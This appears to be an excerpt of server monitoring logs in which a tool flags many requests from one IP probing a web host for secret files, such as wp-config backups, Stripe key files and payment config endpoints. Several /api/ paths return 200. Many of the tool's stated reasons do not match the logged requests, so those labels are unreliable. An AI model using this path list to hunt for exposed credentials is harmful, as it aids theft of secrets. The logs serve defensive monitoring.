Mar 20 15:16:17 ip-172-26-12-110 observer[1565011]: 2026/03/20 15:16:17.124436 [SUSPICIOUS] Source=docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo Reason=Unusual POST to root (/) returning 404 from external IP may indicate probing or misconfiguration. Line=2026-03-20T15:16:03.499592263Z 185.177.72.60 - - [20/Mar/2026:15:16:03 +0000] "captain.admin.kovicloud.com" "GET /wp-config.php.bak HTTP/1.1" 404 9 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) Apple...
Mar 20 15:16:17 ip-172-26-12-110 observer[1565011]: 2026/03/20 15:16:17.124472 [SUSPICIOUS] Source=docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo Reason=Unusual POST to root (/) returning 404 from external IP may indicate probing or misconfiguration. Line=2026-03-20T15:16:03.535555991Z 185.177.72.60 - - [20/Mar/2026:15:16:03 +0000] "captain.admin.kovicloud.com" "GET /wp-config.php.old HTTP/1.1" 404 9 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) Apple...
Mar 20 15:16:17 ip-172-26-12-110 observer[1565011]: 2026/03/20 15:16:17.124504 [SUSPICIOUS] Source=docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo Reason=Unusual POST to root (/) returning 404 from external IP may indicate probing or misconfiguration. Line=2026-03-20T15:16:03.537190849Z 185.177.72.60 - - [20/Mar/2026:15:16:03 +0000] "captain.admin.kovicloud.com" "GET /.vite/manifest.json.map HTTP/1.1" 404 9 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64)...
Mar 20 15:16:17 ip-172-26-12-110 observer[1565011]: 2026/03/20 15:16:17.124583 [SUSPICIOUS] Source=docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo Reason=Unusual POST to root (/) returning 404 from external IP may indicate probing or misconfiguration. Line=2026-03-20T15:16:03.538621112Z 185.177.72.60 - - [20/Mar/2026:15:16:03 +0000] "captain.admin.kovicloud.com" "GET /wp-config.php.txt HTTP/1.1" 404 9 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) Apple...
Mar 20 15:16:17 ip-172-26-12-110 observer[1565011]: 2026/03/20 15:16:17.124616 [SUSPICIOUS] Source=docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo Reason=Unusual POST to root (/) returning 404 from external IP may indicate probing or misconfiguration. Line=2026-03-20T15:16:03.589121089Z 185.177.72.60 - - [20/Mar/2026:15:16:03 +0000] "captain.admin.kovicloud.com" "GET /wp-config.php.save HTTP/1.1" 404 9 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) Appl...
Mar 20 15:16:17 ip-172-26-12-110 observer[1565011]: 2026/03/20 15:16:17.124649 [SUSPICIOUS] Source=docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo Reason=Unusual POST to root (/) returning 404 from external IP may indicate probing or misconfiguration. Line=2026-03-20T15:16:03.661205585Z 185.177.72.60 - - [20/Mar/2026:15:16:03 +0000] "captain.admin.kovicloud.com" "GET /asset-manifest.json.map HTTP/1.1" 404 9 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64)...
Mar 20 15:16:17 ip-172-26-12-110 observer[1565011]: 2026/03/20 15:16:17.124693 [SUSPICIOUS] Source=docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo Reason=Unusual POST to root (/) returning 404 from external IP may indicate probing or misconfiguration. Line=2026-03-20T15:16:03.673894769Z 185.177.72.60 - - [20/Mar/2026:15:16:03 +0000] "captain.admin.kovicloud.com" "GET /wp-config.php~ HTTP/1.1" 404 9 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWeb...
Mar 20 15:16:17 ip-172-26-12-110 observer[1565011]: 2026/03/20 15:16:17.124722 [SUSPICIOUS] Source=docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo Reason=Unusual POST to root (/) returning 404 from external IP may indicate probing or misconfiguration. Line=2026-03-20T15:16:03.685220057Z 185.177.72.60 - - [20/Mar/2026:15:16:03 +0000] "captain.admin.kovicloud.com" "GET /wp-config HTTP/1.1" 404 9 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/5...
Mar 20 15:16:17 ip-172-26-12-110 observer[1565011]: 2026/03/20 15:16:17.124752 [SUSPICIOUS] Source=docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo Reason=Unusual POST to root (/) returning 404 from external IP may indicate probing or misconfiguration. Line=2026-03-20T15:16:03.713243400Z 185.177.72.60 - - [20/Mar/2026:15:16:03 +0000] "captain.admin.kovicloud.com" "GET /wp-config.txt HTTP/1.1" 404 9 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebK...
Mar 20 15:16:17 ip-172-26-12-110 observer[1565011]: 2026/03/20 15:16:17.124779 [SUSPICIOUS] Source=docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo Reason=Unusual POST to root (/) returning 404 from external IP may indicate probing or misconfiguration. Line=2026-03-20T15:16:03.716623481Z 185.177.72.60 - - [20/Mar/2026:15:16:03 +0000] "captain.admin.kovicloud.com" "GET /wp-config.old HTTP/1.1" 404 9 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebK...
Mar 20 15:16:17 ip-172-26-12-110 observer[1565011]: 2026/03/20 15:16:17.124806 [SUSPICIOUS] Source=docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo Reason=Unusual POST to root (/) returning 404 from external IP may indicate probing or misconfiguration. Line=2026-03-20T15:16:03.717485533Z 185.177.72.60 - - [20/Mar/2026:15:16:03 +0000] "captain.admin.kovicloud.com" "GET /wp-content/debug.log HTTP/1.1" 404 9 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) Ap...
Mar 20 15:16:17 ip-172-26-12-110 observer[1565011]: 2026/03/20 15:16:17.124849 [SUSPICIOUS] Source=docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo Reason=Unusual POST to root (/) returning 404 from external IP may indicate probing or misconfiguration. Line=2026-03-20T15:16:03.741704920Z 185.177.72.60 - - [20/Mar/2026:15:16:03 +0000] "captain.admin.kovicloud.com" "GET /wp-json/wc/v3/payment_gateways HTTP/1.1" 404 9 "-" "Mozilla/5.0 (Windows NT 10.0; Win6...
Mar 20 15:16:17 ip-172-26-12-110 observer[1565011]: 2026/03/20 15:16:17.124876 [SUSPICIOUS] Source=docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo Reason=Unusual POST to root (/) returning 404 from external IP may indicate probing or misconfiguration. Line=2026-03-20T15:16:03.764119895Z 185.177.72.60 - - [20/Mar/2026:15:16:03 +0000] "captain.admin.kovicloud.com" "GET /config.js.map HTTP/1.1" 404 9 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebK...
Mar 20 15:16:17 ip-172-26-12-110 observer[1565011]: 2026/03/20 15:16:17.124904 [SUSPICIOUS] Source=docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo Reason=Unusual POST to root (/) returning 404 from external IP may indicate probing or misconfiguration. Line=2026-03-20T15:16:03.776662855Z 185.177.72.60 - - [20/Mar/2026:15:16:03 +0000] "captain.admin.kovicloud.com" "GET /wp-json/wc/v2/payment_gateways HTTP/1.1" 404 9 "-" "Mozilla/5.0 (Windows NT 10.0; Win6...
Mar 20 15:16:17 ip-172-26-12-110 observer[1565011]: 2026/03/20 15:16:17.124930 [SUSPICIOUS] Source=docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo Reason=Unusual POST to root (/) returning 404 from external IP may indicate probing or misconfiguration. Line=2026-03-20T15:16:03.844211677Z 185.177.72.60 - - [20/Mar/2026:15:16:03 +0000] "captain.admin.kovicloud.com" "GET /wp-json/wc/v3/settings/checkout HTTP/1.1" 404 9 "-" "Mozilla/5.0 (Windows NT 10.0; Win...
Mar 20 15:16:17 ip-172-26-12-110 observer[1565011]: 2026/03/20 15:16:17.124959 [SUSPICIOUS] Source=docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo Reason=Unusual POST to root (/) returning 404 from external IP may indicate probing or misconfiguration. Line=2026-03-20T15:16:03.882776248Z 185.177.72.60 - - [20/Mar/2026:15:16:03 +0000] "captain.admin.kovicloud.com" "GET /wp-admin/admin-ajax.php HTTP/1.1" 404 9 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64)...
Mar 20 15:16:17 ip-172-26-12-110 observer[1565011]: 2026/03/20 15:16:17.124988 [SUSPICIOUS] Source=docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo Reason=Unusual POST to root (/) returning 404 from external IP may indicate probing or misconfiguration. Line=2026-03-20T15:16:03.897858105Z 185.177.72.60 - - [20/Mar/2026:15:16:03 +0000] "captain.admin.kovicloud.com" "GET /wp-content/uploads/wc-logs/ HTTP/1.1" 404 9 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; ...
Mar 20 15:16:17 ip-172-26-12-110 observer[1565011]: 2026/03/20 15:16:17.125016 [SUSPICIOUS] Source=docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo Reason=Unusual POST to root (/) returning 404 from external IP may indicate probing or misconfiguration. Line=2026-03-20T15:16:03.904763126Z 185.177.72.60 - - [20/Mar/2026:15:16:03 +0000] "captain.admin.kovicloud.com" "GET /stripe.key HTTP/1.1" 404 9 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/...
Mar 20 15:16:17 ip-172-26-12-110 observer[1565011]: 2026/03/20 15:16:17.125046 [SUSPICIOUS] Source=docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo Reason=Unusual POST to root (/) returning 404 from external IP may indicate probing or misconfiguration. Line=2026-03-20T15:16:03.917624333Z 185.177.72.60 - - [20/Mar/2026:15:16:03 +0000] "captain.admin.kovicloud.com" "GET /bundle.js.map HTTP/1.1" 404 9 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebK...
Mar 20 15:16:17 ip-172-26-12-110 observer[1565011]: 2026/03/20 15:16:17.125075 [SUSPICIOUS] Source=docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo Reason=Unusual POST to root (/) returning 404 from external IP may indicate probing or misconfiguration. Line=2026-03-20T15:16:03.942242208Z 185.177.72.60 - - [20/Mar/2026:15:16:03 +0000] "captain.admin.kovicloud.com" "GET /app.js.map HTTP/1.1" 404 9 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/...
Mar 20 15:16:17 ip-172-26-12-110 observer[1565011]: 2026/03/20 15:16:17.125116 [SUSPICIOUS] Source=docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo Reason=Unusual POST to root (/) returning 404 from external IP may indicate probing or misconfiguration. Line=2026-03-20T15:16:03.943910438Z 185.177.72.60 - - [20/Mar/2026:15:16:03 +0000] "captain.admin.kovicloud.com" "GET /stripe.txt HTTP/1.1" 404 9 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/...
Mar 20 15:16:17 ip-172-26-12-110 observer[1565011]: 2026/03/20 15:16:17.125668 [SUSPICIOUS] Source=docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo Reason=Unusual POST to root (/) returning 404 from external IP may indicate probing or misconfiguration. Line=2026-03-20T15:16:04.023068798Z 185.177.72.60 - - [20/Mar/2026:15:16:04 +0000] "captain.admin.kovicloud.com" "GET /stripe.json HTTP/1.1" 404 9 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit...
Mar 20 15:16:17 ip-172-26-12-110 observer[1565011]: 2026/03/20 15:16:17.125725 [SUSPICIOUS] Source=docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo Reason=Unusual POST to root (/) returning 404 from external IP may indicate probing or misconfiguration. Line=2026-03-20T15:16:04.039349787Z 185.177.72.60 - - [20/Mar/2026:15:16:04 +0000] "captain.admin.kovicloud.com" "GET /stripe.log HTTP/1.1" 404 9 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/...
Mar 20 15:16:17 ip-172-26-12-110 observer[1565011]: 2026/03/20 15:16:17.125754 [SUSPICIOUS] Source=docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo Reason=Unusual POST to root (/) returning 404 from external IP may indicate probing or misconfiguration. Line=2026-03-20T15:16:04.054018457Z 185.177.72.60 - - [20/Mar/2026:15:16:04 +0000] "captain.admin.kovicloud.com" "GET /stripe.conf HTTP/1.1" 404 9 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit...
Mar 20 15:16:17 ip-172-26-12-110 observer[1565011]: 2026/03/20 15:16:17.125779 [SUSPICIOUS] Source=docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo Reason=Unusual POST to root (/) returning 404 from external IP may indicate probing or misconfiguration. Line=2026-03-20T15:16:04.090970002Z 185.177.72.60 - - [20/Mar/2026:15:16:04 +0000] "captain.admin.kovicloud.com" "GET /stripe.ini HTTP/1.1" 404 9 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/...
Mar 20 15:16:17 ip-172-26-12-110 observer[1565011]: 2026/03/20 15:16:17.125806 [SUSPICIOUS] Source=docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo Reason=Unusual POST to root (/) returning 404 from external IP may indicate probing or misconfiguration. Line=2026-03-20T15:16:04.116486052Z 185.177.72.60 - - [20/Mar/2026:15:16:04 +0000] "captain.admin.kovicloud.com" "GET /stripe.bak HTTP/1.1" 404 9 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/...
Mar 20 15:16:17 ip-172-26-12-110 observer[1565011]: 2026/03/20 15:16:17.125851 [SUSPICIOUS] Source=docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo Reason=Unusual POST to root (/) returning 404 from external IP may indicate probing or misconfiguration. Line=2026-03-20T15:16:04.172999453Z 185.177.72.60 - - [20/Mar/2026:15:16:04 +0000] "captain.admin.kovicloud.com" "GET /stripe.old HTTP/1.1" 404 9 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/...
Mar 20 15:16:17 ip-172-26-12-110 observer[1565011]: 2026/03/20 15:16:17.125888 [SUSPICIOUS] Source=docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo Reason=Unusual POST to root (/) returning 404 from external IP may indicate probing or misconfiguration. Line=2026-03-20T15:16:04.173648208Z 185.177.72.60 - - [20/Mar/2026:15:16:04 +0000] "captain.admin.kovicloud.com" "GET /stripe.save HTTP/1.1" 404 9 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit...
Mar 20 15:16:17 ip-172-26-12-110 observer[1565011]: 2026/03/20 15:16:17.125917 [SUSPICIOUS] Source=docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo Reason=Unusual POST to root (/) returning 404 from external IP may indicate probing or misconfiguration. Line=2026-03-20T15:16:04.183892214Z 185.177.72.60 - - [20/Mar/2026:15:16:04 +0000] "captain.admin.kovicloud.com" "GET /env.json.map HTTP/1.1" 404 9 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKi...
Mar 20 15:16:17 ip-172-26-12-110 observer[1565011]: 2026/03/20 15:16:17.125953 [SUSPICIOUS] Source=docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo Reason=Unusual POST to root (/) returning 404 from external IP may indicate probing or misconfiguration. Line=2026-03-20T15:16:04.226804824Z 185.177.72.60 - - [20/Mar/2026:15:16:04 +0000] "captain.admin.kovicloud.com" "GET /stripe.backup HTTP/1.1" 404 9 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebK...
Mar 20 15:16:17 ip-172-26-12-110 observer[1565011]: 2026/03/20 15:16:17.125982 [SUSPICIOUS] Source=docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo Reason=Unusual POST to root (/) returning 404 from external IP may indicate probing or misconfiguration. Line=2026-03-20T15:16:04.282046245Z 185.177.72.60 - - [20/Mar/2026:15:16:04 +0000] "captain.admin.kovicloud.com" "GET /stripe_keys.json HTTP/1.1" 404 9 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleW...
Mar 20 15:16:17 ip-172-26-12-110 observer[1565011]: 2026/03/20 15:16:17.126010 [SUSPICIOUS] Source=docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo Reason=Unusual POST to root (/) returning 404 from external IP may indicate probing or misconfiguration. Line=2026-03-20T15:16:04.306027015Z 185.177.72.60 - - [20/Mar/2026:15:16:04 +0000] "captain.admin.kovicloud.com" "GET /stripe_secret.json HTTP/1.1" 404 9 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) Appl...
Mar 20 15:16:17 ip-172-26-12-110 observer[1565011]: 2026/03/20 15:16:17.126038 [SUSPICIOUS] Source=docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo Reason=Unusual POST to root (/) returning 404 from external IP may indicate probing or misconfiguration. Line=2026-03-20T15:16:04.333021272Z 185.177.72.60 - - [20/Mar/2026:15:16:04 +0000] "captain.admin.kovicloud.com" "GET /stripe_config.json HTTP/1.1" 404 9 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) Appl...
Mar 20 15:16:17 ip-172-26-12-110 observer[1565011]: 2026/03/20 15:16:17.126073 [SUSPICIOUS] Source=docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo Reason=Unusual POST to root (/) returning 404 from external IP may indicate probing or misconfiguration. Line=2026-03-20T15:16:04.335428255Z 185.177.72.60 - - [20/Mar/2026:15:16:04 +0000] "captain.admin.kovicloud.com" "GET /config/stripe.json HTTP/1.1" 404 9 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) Appl...
Mar 20 15:16:17 ip-172-26-12-110 observer[1565011]: 2026/03/20 15:16:17.126102 [SUSPICIOUS] Source=docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo Reason=Unusual POST to root (/) returning 404 from external IP may indicate probing or misconfiguration. Line=2026-03-20T15:16:04.349449794Z 185.177.72.60 - - [20/Mar/2026:15:16:04 +0000] "captain.admin.kovicloud.com" "GET /config/stripe.yaml HTTP/1.1" 404 9 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) Appl...
Mar 20 15:16:17 ip-172-26-12-110 observer[1565011]: 2026/03/20 15:16:17.126130 [SUSPICIOUS] Source=docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo Reason=Unusual POST to root (/) returning 404 from external IP may indicate probing or misconfiguration. Line=2026-03-20T15:16:04.355245062Z 185.177.72.60 - - [20/Mar/2026:15:16:04 +0000] "captain.admin.kovicloud.com" "GET /manifest.json.map HTTP/1.1" 404 9 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) Apple...
Mar 20 15:16:17 ip-172-26-12-110 observer[1565011]: 2026/03/20 15:16:17.126174 [SUSPICIOUS] Source=docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo Reason=Unusual POST to root (/) returning 404 from external IP may indicate probing or misconfiguration. Line=2026-03-20T15:16:04.376204104Z 185.177.72.60 - - [20/Mar/2026:15:16:04 +0000] "captain.admin.kovicloud.com" "GET /config/stripe.yml HTTP/1.1" 404 9 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) Apple...
Mar 20 15:16:17 ip-172-26-12-110 observer[1565011]: 2026/03/20 15:16:17.126203 [SUSPICIOUS] Source=docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo Reason=Unusual POST to root (/) returning 404 from external IP may indicate probing or misconfiguration. Line=2026-03-20T15:16:04.441842314Z 185.177.72.60 - - [20/Mar/2026:15:16:04 +0000] "captain.admin.kovicloud.com" "GET /config/stripe.ts HTTP/1.1" 404 9 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleW...
Mar 20 15:16:17 ip-172-26-12-110 observer[1565011]: 2026/03/20 15:16:17.126279 [SUSPICIOUS] Source=docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo Reason=Request to /api/.env is a common sensitive file exposure attempt; HTTP 200 suggests potential misconfiguration or exposure Line=2026-03-20T15:16:04.447144169Z 185.177.72.60 - - [20/Mar/2026:15:16:04 +0000] "captain.admin.kovicloud.com" "GET /api/stripe.ts HTTP/1.1" 200 83 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWeb...
Mar 20 15:16:17 ip-172-26-12-110 observer[1565011]: 2026/03/20 15:16:17.126311 [SUSPICIOUS] Source=docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo Reason=Unusual POST to root (/) returning 404 from external IP may indicate probing or misconfiguration. Line=2026-03-20T15:16:04.490904738Z 185.177.72.60 - - [20/Mar/2026:15:16:04 +0000] "captain.admin.kovicloud.com" "GET /secrets/stripe.json HTTP/1.1" 404 9 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) App...
Mar 20 15:16:17 ip-172-26-12-110 observer[1565011]: 2026/03/20 15:16:17.126346 [SUSPICIOUS] Source=docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo Reason=Unusual POST to root (/) returning 404 from external IP may indicate probing or misconfiguration. Line=2026-03-20T15:16:04.500882325Z 185.177.72.60 - - [20/Mar/2026:15:16:04 +0000] "captain.admin.kovicloud.com" "GET /backup/stripe.json HTTP/1.1" 404 9 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) Appl...
Mar 20 15:16:17 ip-172-26-12-110 observer[1565011]: 2026/03/20 15:16:17.126373 [SUSPICIOUS] Source=docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo Reason=Unusual POST to root (/) returning 404 from external IP may indicate probing or misconfiguration. Line=2026-03-20T15:16:04.533294742Z 185.177.72.60 - - [20/Mar/2026:15:16:04 +0000] "captain.admin.kovicloud.com" "GET /storage/stripe.json HTTP/1.1" 404 9 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) App...
Mar 20 15:16:17 ip-172-26-12-110 observer[1565011]: 2026/03/20 15:16:17.126401 [SUSPICIOUS] Source=docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo Reason=Unusual POST to root (/) returning 404 from external IP may indicate probing or misconfiguration. Line=2026-03-20T15:16:04.560383074Z 185.177.72.60 - - [20/Mar/2026:15:16:04 +0000] "captain.admin.kovicloud.com" "GET /storage/stripe.keys HTTP/1.1" 404 9 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) App...
Mar 20 15:16:17 ip-172-26-12-110 observer[1565011]: 2026/03/20 15:16:17.126429 [SUSPICIOUS] Source=docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo Reason=Unusual POST to root (/) returning 404 from external IP may indicate probing or misconfiguration. Line=2026-03-20T15:16:04.565125733Z 185.177.72.60 - - [20/Mar/2026:15:16:04 +0000] "captain.admin.kovicloud.com" "GET /storage/app/stripe.json HTTP/1.1" 404 9 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64)...
Mar 20 15:16:17 ip-172-26-12-110 observer[1565011]: 2026/03/20 15:16:17.126458 [SUSPICIOUS] Source=docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo Reason=Unusual POST to root (/) returning 404 from external IP may indicate probing or misconfiguration. Line=2026-03-20T15:16:04.616498612Z 185.177.72.60 - - [20/Mar/2026:15:16:04 +0000] "captain.admin.kovicloud.com" "GET /storage/keys/stripe.json HTTP/1.1" 404 9 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64...
Mar 20 15:16:17 ip-172-26-12-110 observer[1565011]: 2026/03/20 15:16:17.126486 [SUSPICIOUS] Source=docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo Reason=Unusual POST to root (/) returning 404 from external IP may indicate probing or misconfiguration. Line=2026-03-20T15:16:04.626204883Z 185.177.72.60 - - [20/Mar/2026:15:16:04 +0000] "captain.admin.kovicloud.com" "GET /storage/secrets/stripe.json HTTP/1.1" 404 9 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; ...
Mar 20 15:16:17 ip-172-26-12-110 observer[1565011]: 2026/03/20 15:16:17.126511 [SUSPICIOUS] Source=docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo Reason=Unusual POST to root (/) returning 404 from external IP may indicate probing or misconfiguration. Line=2026-03-20T15:16:04.649229981Z 185.177.72.60 - - [20/Mar/2026:15:16:04 +0000] "captain.admin.kovicloud.com" "GET /settings/stripe.py HTTP/1.1" 404 9 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) Appl...
Mar 20 15:16:17 ip-172-26-12-110 observer[1565011]: 2026/03/20 15:16:17.126553 [SUSPICIOUS] Source=docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo Reason=Unusual POST to root (/) returning 404 from external IP may indicate probing or misconfiguration. Line=2026-03-20T15:16:04.682533581Z 185.177.72.60 - - [20/Mar/2026:15:16:04 +0000] "captain.admin.kovicloud.com" "GET /config/initializers/stripe.rb HTTP/1.1" 404 9 "-" "Mozilla/5.0 (Windows NT 10.0; Win64...
Mar 20 15:16:17 ip-172-26-12-110 observer[1565011]: 2026/03/20 15:16:17.126583 [SUSPICIOUS] Source=docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo Reason=Unusual POST to root (/) returning 404 from external IP may indicate probing or misconfiguration. Line=2026-03-20T15:16:04.684050123Z 185.177.72.60 - - [20/Mar/2026:15:16:04 +0000] "captain.admin.kovicloud.com" "GET /app/config/stripe.yml HTTP/1.1" 404 9 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) A...
Mar 20 15:16:17 ip-172-26-12-110 observer[1565011]: 2026/03/20 15:16:17.126615 [SUSPICIOUS] Source=docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo Reason=Unusual POST to root (/) returning 404 from external IP may indicate probing or misconfiguration. Line=2026-03-20T15:16:04.738878028Z 185.177.72.60 - - [20/Mar/2026:15:16:04 +0000] "captain.admin.kovicloud.com" "GET /config/payment.yml HTTP/1.1" 404 9 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) Appl...
Mar 20 15:16:17 ip-172-26-12-110 observer[1565011]: 2026/03/20 15:16:17.126644 [SUSPICIOUS] Source=docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo Reason=Request to /api/.env is a common sensitive file exposure attempt; HTTP 200 suggests potential misconfiguration or exposure Line=2026-03-20T15:16:04.756819836Z 185.177.72.60 - - [20/Mar/2026:15:16:04 +0000] "captain.admin.kovicloud.com" "GET /api/config HTTP/1.1" 200 83 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit...
Mar 20 15:16:17 ip-172-26-12-110 observer[1565011]: 2026/03/20 15:16:17.126672 [SUSPICIOUS] Source=docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo Reason=Request to /api/.env is a common sensitive file exposure attempt; HTTP 200 suggests potential misconfiguration or exposure Line=2026-03-20T15:16:04.759772286Z 185.177.72.60 - - [20/Mar/2026:15:16:04 +0000] "captain.admin.kovicloud.com" "GET /api/v1/config HTTP/1.1" 200 83 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWeb...
Mar 20 15:16:17 ip-172-26-12-110 observer[1565011]: 2026/03/20 15:16:17.126701 [SUSPICIOUS] Source=docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo Reason=Request to /api/.env is a common sensitive file exposure attempt; HTTP 200 suggests potential misconfiguration or exposure Line=2026-03-20T15:16:04.792376572Z 185.177.72.60 - - [20/Mar/2026:15:16:04 +0000] "captain.admin.kovicloud.com" "GET /api/settings HTTP/1.1" 200 83 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebK...
Mar 20 15:16:17 ip-172-26-12-110 observer[1565011]: 2026/03/20 15:16:17.126730 [SUSPICIOUS] Source=docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo Reason=Request to /api/.env is a common sensitive file exposure attempt; HTTP 200 suggests potential misconfiguration or exposure Line=2026-03-20T15:16:04.817310652Z 185.177.72.60 - - [20/Mar/2026:15:16:04 +0000] "captain.admin.kovicloud.com" "GET /api/v1/settings HTTP/1.1" 200 83 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleW...
Mar 20 15:16:17 ip-172-26-12-110 observer[1565011]: 2026/03/20 15:16:17.126767 [SUSPICIOUS] Source=docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo Reason=Request to /api/.env is a common sensitive file exposure attempt; HTTP 200 suggests potential misconfiguration or exposure Line=2026-03-20T15:16:04.824290532Z 185.177.72.60 - - [20/Mar/2026:15:16:04 +0000] "captain.admin.kovicloud.com" "GET /api/stripe/config HTTP/1.1" 200 83 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) Appl...
Mar 20 15:16:17 ip-172-26-12-110 observer[1565011]: 2026/03/20 15:16:17.126878 [SUSPICIOUS] Source=docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo Reason=Request to /api/.env is a common sensitive file exposure attempt; HTTP 200 suggests potential misconfiguration or exposure Line=2026-03-20T15:16:04.832130800Z 185.177.72.60 - - [20/Mar/2026:15:16:04 +0000] "captain.admin.kovicloud.com" "GET /api/payment/config HTTP/1.1" 200 83 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) App...
